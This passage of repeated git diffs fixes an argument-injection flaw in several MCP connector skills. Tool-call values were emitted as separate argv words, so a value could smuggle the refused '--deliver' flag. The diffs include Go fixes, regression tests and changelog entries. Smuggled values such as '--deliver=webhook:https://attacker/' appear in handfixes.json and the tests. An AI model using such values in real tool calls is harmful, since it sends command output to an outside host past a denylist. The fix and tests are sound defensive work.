+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/action1/CHANGELOG.md
+++ b/skills/action1/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01
 

--- a/skills/action1/CHANGELOG.md
+++ b/skills/action1/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/action1/CHANGELOG.md
+++ b/skills/action1/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-09-01
 
 ### Fixed

--- a/skills/action1/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/action1/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/action1/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/action1/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/action1/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/action1/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/action1/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/action1/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/action1/cli/internal/mcp/intents.go
+++ b/skills/action1/cli/internal/mcp/intents.go
@@ -75,10 +75,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {

--- a/skills/action1/handfixes.json
+++ b/skills/action1/handfixes.json
@@ -335,6 +335,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/action1/handfixes.json
+++ b/skills/action1/handfixes.json
@@ -350,8 +350,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -361,7 +373,32 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
     }
    ]
   }

--- a/skills/afi/CHANGELOG.md
+++ b/skills/afi/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-08-26
 

--- a/skills/afi/CHANGELOG.md
+++ b/skills/afi/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-08-26
 
 ### Fixed

--- a/skills/afi/CHANGELOG.md
+++ b/skills/afi/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-08-26

--- a/skills/afi/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/afi/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/afi/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/afi/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/afi/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/afi/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/afi/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/afi/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/afi/handfixes.json
+++ b/skills/afi/handfixes.json
@@ -202,6 +202,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/afi/handfixes.json
+++ b/skills/afi/handfixes.json
@@ -217,8 +217,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -228,7 +240,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/appdirect/CHANGELOG.md
+++ b/skills/appdirect/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
